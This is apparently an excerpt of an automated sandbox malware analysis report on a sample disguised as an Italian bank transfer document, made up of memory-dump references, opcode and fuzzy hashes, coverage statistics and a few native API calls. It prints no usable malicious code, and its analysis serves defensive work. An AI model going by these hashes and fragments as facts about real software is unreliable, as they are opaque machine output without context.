                                  • Instruction Fuzzy Hash: 50215CB16043049FF3624F1BEC59F2A7BA9EB85711F050866F146CB2D1C6759E10CBA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b5a4d95e1335d739521786385524c3454297d487fb0dcdcf95a1ccf47d7960b3
                                  • Instruction ID: 76b18f5a9e7348af6c34ac406fe82e806f5e6caeccf9c50d4cec8deb77d8bd10
                                  • Opcode Fuzzy Hash: b5a4d95e1335d739521786385524c3454297d487fb0dcdcf95a1ccf47d7960b3
                                  • Instruction Fuzzy Hash: F221607490E244CFFBA5CF66C5504FDBBBAEB4A300B04A49EC929AB282D3305585CF90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53617dff4556472b5a14e21cd1a5e62bf621b0904184174387b113ab12d11514
                                  • Instruction ID: 6e9901882b0adf4d75cc56d7cc2cbf73619938054d85b7c0713c180a036357ba
                                  • Opcode Fuzzy Hash: 53617dff4556472b5a14e21cd1a5e62bf621b0904184174387b113ab12d11514
                                  • Instruction Fuzzy Hash: 5121CDB4D09219CFFBA4CF56C5546FDB7BAAB5D300F01505AD92AA7281D3349A81CF90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359648354.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c0d000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 662243b0904578220a08547acdec898fecb964016ffcace9f586de4d6e410ff0
                                  • Instruction ID: b7d1b35813b8a7adb0f69595a5895cae86851a027e75d6f1e3b54a01905a1aa0
                                  • Opcode Fuzzy Hash: 662243b0904578220a08547acdec898fecb964016ffcace9f586de4d6e410ff0
                                  • Instruction Fuzzy Hash: 03212371604300EFDB05DF98D9C0B26BBA5FB88314F20C6ADE84A4B2D6C336DD46CA61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359648354.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c0d000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 27f229643428ac124d516382fd194b541d9293eaa7c0bb470f8cfe425465add0
                                  • Instruction ID: 664da047be02bca40c667cf19ca9ab2b649d2ceb18361a5d8f2c8fd242a7899c
                                  • Opcode Fuzzy Hash: 27f229643428ac124d516382fd194b541d9293eaa7c0bb470f8cfe425465add0
                                  • Instruction Fuzzy Hash: 6721F275604240DFDB14DF58D9C0B26BB65EB88318F20C5ADE84E4B296C336D807CA62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ea622d6a84fba0bd6f5bc4455078f762a6d698b1933406b3a530de1e8696dba
                                  • Instruction ID: 968a8921f834a674617ae7ebee6da6bb72415e894881813cfef7afe48d27b4fa
                                  • Opcode Fuzzy Hash: 5ea622d6a84fba0bd6f5bc4455078f762a6d698b1933406b3a530de1e8696dba
                                  • Instruction Fuzzy Hash: 512107B4E05609DFDB44DFA5DA445AEBBF2AB88300F6494AA8915A7394E7308B41CF90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a6a98f9898eba78aacadd44e38b1d259f32eb740a1fbec8d49fd86071cb80b09
                                  • Instruction ID: 52d0b53eb4074ea0a59fb57fca44a768f4dcada0085dd85b0195f69d2c54fbd0
                                  • Opcode Fuzzy Hash: a6a98f9898eba78aacadd44e38b1d259f32eb740a1fbec8d49fd86071cb80b09
                                  • Instruction Fuzzy Hash: 6031F5B0D01258DFEB60DF9AC588B8EBFF5EB08314F208469E405BB281C7B59945CF95
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 036271695ce7fb0dac0d7ce198c996d9a5e81e66120018d80b27b79e91d101b6
                                  • Instruction ID: bca42b8f4f141b7b29757d12800ba77becbe522c37dbbbc1044bc1e5fe3ff259
                                  • Opcode Fuzzy Hash: 036271695ce7fb0dac0d7ce198c996d9a5e81e66120018d80b27b79e91d101b6
                                  • Instruction Fuzzy Hash: 1D21F3B0D01258DFEB60DF99C588BCEBFF5AB08314F24846AE405BB291C7749945CFA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f77350c3e4e21a8d9c90b470614063f3df9c84a9d142eed84604499f106c8e47
                                  • Instruction ID: a39ce2f523ebc676e96e4265ac77476a46699edba0b020bfd86830d8e0dc6731
                                  • Opcode Fuzzy Hash: f77350c3e4e21a8d9c90b470614063f3df9c84a9d142eed84604499f106c8e47
                                  • Instruction Fuzzy Hash: 3C21FCB4D49249DFDB84DFA9C5809AEBBF5EB4D300F20549AD409A7792D3319E40CF91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3f1d8dc6004dccc62f80cba1ac6f41dc0239f371fd4199022278c76e126cd717
                                  • Instruction ID: 9a944b39b1052d3ec116afcff25a8573c709d7804fe09522f29cdf45dde4e17e
                                  • Opcode Fuzzy Hash: 3f1d8dc6004dccc62f80cba1ac6f41dc0239f371fd4199022278c76e126cd717
                                  • Instruction Fuzzy Hash: 3511BAB4D0D208CFFBA4CF96C5505FDB7BAAB4D300B11A45AD92AA7241D33499818F94
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359648354.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c0d000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff30a840d619e34613b51980f1397ba8ef397a19bb8d8d0dd75502f1efbbac8f
                                  • Instruction ID: 6cce671f4c6727e2e44c6b7a8f24a9555c4e668d487c16e8f1b4f86555039004
                                  • Opcode Fuzzy Hash: ff30a840d619e34613b51980f1397ba8ef397a19bb8d8d0dd75502f1efbbac8f
                                  • Instruction Fuzzy Hash: 672192755093C08FCB02CF24D990715BF71EB46314F29C5EAD8898F6A7C33A980ACB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a61fdf28efe2433cabf870adc85a1e58efe350849fc23d01a9e45e3d83c16d76
                                  • Instruction ID: 865f514ba936daaf10ad0b7a48a5a84dbe77723f9794d420cbf5cde24b836bd2
                                  • Opcode Fuzzy Hash: a61fdf28efe2433cabf870adc85a1e58efe350849fc23d01a9e45e3d83c16d76
                                  • Instruction Fuzzy Hash: 0521B6B4E49209DFDB84DFAAC1809AEBBF5AB4D300F209499D809A7791D7319E40CF91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 40b58e2a0a636d860e68321438dd94a6df798c8ff6d42d50352cf3eeb18ebea4
                                  • Instruction ID: 9f299673e8e8eff053714ec3034d73a9fd6d18662f07c0661401cbcb38edc871
                                  • Opcode Fuzzy Hash: 40b58e2a0a636d860e68321438dd94a6df798c8ff6d42d50352cf3eeb18ebea4
                                  • Instruction Fuzzy Hash: 7A218832910B5286DB11DF69D850282B371FF94324F198ABADC4D3F24AEB717584CBA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f3975d6839b54ef3a4b90fd85c8c27a5731eaa471579107c81df18b86c622263
                                  • Instruction ID: 8b2abbf077c3b19fa37797f14f9001183f3cb28391f1b0634e88093aea88d5ad
                                  • Opcode Fuzzy Hash: f3975d6839b54ef3a4b90fd85c8c27a5731eaa471579107c81df18b86c622263
                                  • Instruction Fuzzy Hash: E011C2B2E016168F9B55EB798C445BFB7F7EFC8220B15852DE829D7380EF309A018760
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24f76a1fdd8d81eb32579ce1b5ac9297d6c9a7c9487532883e03f5ce928d29d9
                                  • Instruction ID: 3adadb39479d48d14cda063c3f9a52be5a27c715635c4c36638eae25663a3659
                                  • Opcode Fuzzy Hash: 24f76a1fdd8d81eb32579ce1b5ac9297d6c9a7c9487532883e03f5ce928d29d9
                                  • Instruction Fuzzy Hash: 0D111970E49258DFEB44EFA9C5409AEBFF5AB4D310F149999D81897392D3319B41CF80
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e241088192c0e38bd054db75a7cbd3921145070be26d44006b51731e4370c590
                                  • Instruction ID: c14185c81fde26564cac7e693b429c27512a863a506f753e58eabd5c4accbd9f
                                  • Opcode Fuzzy Hash: e241088192c0e38bd054db75a7cbd3921145070be26d44006b51731e4370c590
                                  • Instruction Fuzzy Hash: AB2103B59003499FDB50CF9AD844ADEBBF4FB48310F108419E919B7340C374A945CFA5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359580754.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bfd000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c66b0579d1dc232cfd297306288cbc48c9e04d1145202a0d0095b54c44be8674
                                  • Instruction ID: 387ae151d02beefdbb086a12eb533a57f4b25a0ce74c8af9698f46cf1b5fa589
                                  • Opcode Fuzzy Hash: c66b0579d1dc232cfd297306288cbc48c9e04d1145202a0d0095b54c44be8674
                                  • Instruction Fuzzy Hash: CE11D376504284CFCF16CF14D5C4B26BFB2FB94314F24C6A9D9450B656C336D85ACBA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359580754.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bfd000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c66b0579d1dc232cfd297306288cbc48c9e04d1145202a0d0095b54c44be8674
                                  • Instruction ID: 973ecca2d25db0f652e0c7c741af340f3b1b32b75a9a6f9e5afbc217eeba64ab
                                  • Opcode Fuzzy Hash: c66b0579d1dc232cfd297306288cbc48c9e04d1145202a0d0095b54c44be8674
                                  • Instruction Fuzzy Hash: 9C110372504244CFCB02CF04D5C0B26BFB2FB94324F24C6A9D9490B756C33AE85ACBA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9fb29aeb9ccce2c429200f24daae46df6f36d8b38e3eed13866921382e509c9
                                  • Instruction ID: d9db972400e120a8773955c21f8d518202f93a348dd6ea3584edfd6d22cfb9e8
                                  • Opcode Fuzzy Hash: d9fb29aeb9ccce2c429200f24daae46df6f36d8b38e3eed13866921382e509c9
                                  • Instruction Fuzzy Hash: 421118B8D15208EFDB80DFA9D94569EFBB5AF48300F1084AAD828E7391E7705A44DF91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1c61af40c97b772eda17566f48128550a895e012d3347088d4969a4d4e7c18cc
                                  • Instruction ID: adab54145cad85678eeed6b411e95743b617cf52a03a6b75a06aa55f3d745991
                                  • Opcode Fuzzy Hash: 1c61af40c97b772eda17566f48128550a895e012d3347088d4969a4d4e7c18cc
                                  • Instruction Fuzzy Hash: 7E116A32910B5286DB01DF59D850291B365FF95324F19977ADC4D3F30AEB71798487A0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359648354.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c0d000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b893be8abb01456dc092d417a67761f1ad257a952e1dac794a5e58dc54f31fa7
                                  • Instruction ID: aeb5b983dd37877a318272a659f08d3ee296432334730a1de883c20e6b42b407
                                  • Opcode Fuzzy Hash: b893be8abb01456dc092d417a67761f1ad257a952e1dac794a5e58dc54f31fa7
                                  • Instruction Fuzzy Hash: F211DD75504280DFCB02CF54C5C0B15FBB1FB84314F24C6ADD84A4B696C33AD94ACB61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f4a1f9a1c2bdd8258e66e68b6f112dacb5776e2df9441fc5da30b5da987d04d
                                  • Instruction ID: be6717f2dc45df115a7d7cc9db281440b94b095c7c46c7b75231f1a088e1d7bb
                                  • Opcode Fuzzy Hash: 5f4a1f9a1c2bdd8258e66e68b6f112dacb5776e2df9441fc5da30b5da987d04d
                                  • Instruction Fuzzy Hash: 8C1130B060A505EFE7819F17F4506217BB2F709306B1154D6D58A8F282EA33C9768786
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 014b5e309f7f055d98d59ac41e509e2534cc2d24acab0721d5c5c01d41d8f256
                                  • Instruction ID: 83ca5cf636454cadb9b050f95a33dc937cfc0edb6519bcc853c31a9a8763fd4d
                                  • Opcode Fuzzy Hash: 014b5e309f7f055d98d59ac41e509e2534cc2d24acab0721d5c5c01d41d8f256
                                  • Instruction Fuzzy Hash: 330192B4D09208DFEB44CF65E5405EDBBB9FB4E301F0491AAD8099B792D3309A41CF80
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b3d1b986884e6f3bf069da7b08da78d23b9881831d16e2b574ab91d5a461f45e
                                  • Instruction ID: b30d563a316b4c5a0223e99d1d5b8523a968f20fecb003964e152faa5b8b4a01
                                  • Opcode Fuzzy Hash: b3d1b986884e6f3bf069da7b08da78d23b9881831d16e2b574ab91d5a461f45e
                                  • Instruction Fuzzy Hash: 800178B4D05208EFDB80CFA9DA842ADBFB5EB45300F0485AED828A7390E7340B40CF51
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c57283c1f73c2f566796dda032eb3a24b0f067bcb88b6e45de2a83b92257ef28
                                  • Instruction ID: 91ba188f4b845c2d8efb09712c5ff7777ba3bfde25238ecb22f81db0b8c9ea3a
                                  • Opcode Fuzzy Hash: c57283c1f73c2f566796dda032eb3a24b0f067bcb88b6e45de2a83b92257ef28
                                  • Instruction Fuzzy Hash: 63015EB060A509EFE7C0DF57F4506217BB2F748306F2154D9D68A8B282EB33C9728B85
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6ce1fd7001db26c9998a74303bd6efdb04d4dfca9aab7efec69cbe123745e18
                                  • Instruction ID: 43c9fd138c0e1a19c047f0b94156bf5f924184d4dae12231876084ff958be620
                                  • Opcode Fuzzy Hash: d6ce1fd7001db26c9998a74303bd6efdb04d4dfca9aab7efec69cbe123745e18
                                  • Instruction Fuzzy Hash: DD014FB4E49108DFEB44DF69E040AADBBBDFB8D301F1090A9D8099B381D7309A41CF80
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 71912529565be62c45cf24a9c49d637c5f3549a7f8bb89f0aa180e7a77bfdbdc
                                  • Instruction ID: 8c85905da5eda5b6f0e2665953dce0d0f80a97acb31f4dd95d07266c0b88707e
                                  • Opcode Fuzzy Hash: 71912529565be62c45cf24a9c49d637c5f3549a7f8bb89f0aa180e7a77bfdbdc
                                  • Instruction Fuzzy Hash: 62F0F672B041109FFB306B35E848A2A37A6EF19364B1500BCE885C73A1DE25EF02C795
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHp$PHp
                                  • API String ID: 0-4032155144
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: {:o
                                  • API String ID: 0-750842120
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ef5f111f5fa2e91fc51622b5fd4fba16b1947e1ce88e46b2a6719afc2d2fa68
                                  • Instruction ID: a8b28dd1b537cae7cc4a4da255efc76706caba3034f94fe0372c98cf3a09171f
                                  • Opcode Fuzzy Hash: 5ef5f111f5fa2e91fc51622b5fd4fba16b1947e1ce88e46b2a6719afc2d2fa68
                                  • Instruction Fuzzy Hash: BFE11CB4E101198FDB14DF99C5809AEFBF2FF49304F24826AE559AB359D730A941CF60
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14a122d969254b1d772df803d5f5d11f2cb44fa8f3d51ddc68396369f768acfa
                                  • Instruction ID: bbe7aef0b239451e533ec2d7e4e35befb8a666da94a94a4ea9c140d8e2a9d1b2
                                  • Opcode Fuzzy Hash: 14a122d969254b1d772df803d5f5d11f2cb44fa8f3d51ddc68396369f768acfa
                                  • Instruction Fuzzy Hash: 8CC012E5DAF1489AD710099064140F4B73CCACB022F003153E71DA7C02922681294354

                                  Execution Graph

                                  Execution Coverage:1.4%
                                  Dynamic/Decrypted Code Coverage:2.7%
                                  Signature Coverage:5.8%
                                  Total number of Nodes:555
                                  Total number of Limit Nodes:70

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 41a410-41a426 1 41a42c-41a459 NtReadFile 0->1 2 41a427 call 41af60 0->2 2->1
                                  APIs
                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1JA$rMA$rMA
                                  • API String ID: 2738559852-782607585
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 3 41a40a-41a459 call 41af60 NtReadFile
                                  APIs
                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1JA$rMA$rMA
                                  • API String ID: 2738559852-782607585
                                  • Opcode ID: 04ce376e678edcdb9751289a0f82548d436417c29a13e682c939fe5dcdc6d76c
                                  • Instruction ID: b0d4b4de7d76c8bf591afcef4104654b5335bd7ab6703c25e51113693fc8203e
                                  • Opcode Fuzzy Hash: 04ce376e678edcdb9751289a0f82548d436417c29a13e682c939fe5dcdc6d76c
                                  • Instruction Fuzzy Hash: B1F01DB6200149ABCB04DF98D990CEB77ADFF8C314B15864DF95D97201C634E8558BA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 219 40acf0-40ad0c 220 40ad14-40ad19 219->220 221 40ad0f call 41cc50 219->221 222 40ad1b-40ad1e 220->222 223 40ad1f-40ad2d call 41d070 220->223 221->220 226 40ad3d-40ad4e call 41b4a0 223->226 227 40ad2f-40ad3a call 41d2f0 223->227 232 40ad50-40ad64 LdrLoadDll 226->232 233 40ad67-40ad6a 226->233 227->226 232->233
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 234 41a35a-41a3b1 call 41af60 NtCreateFile
                                  APIs
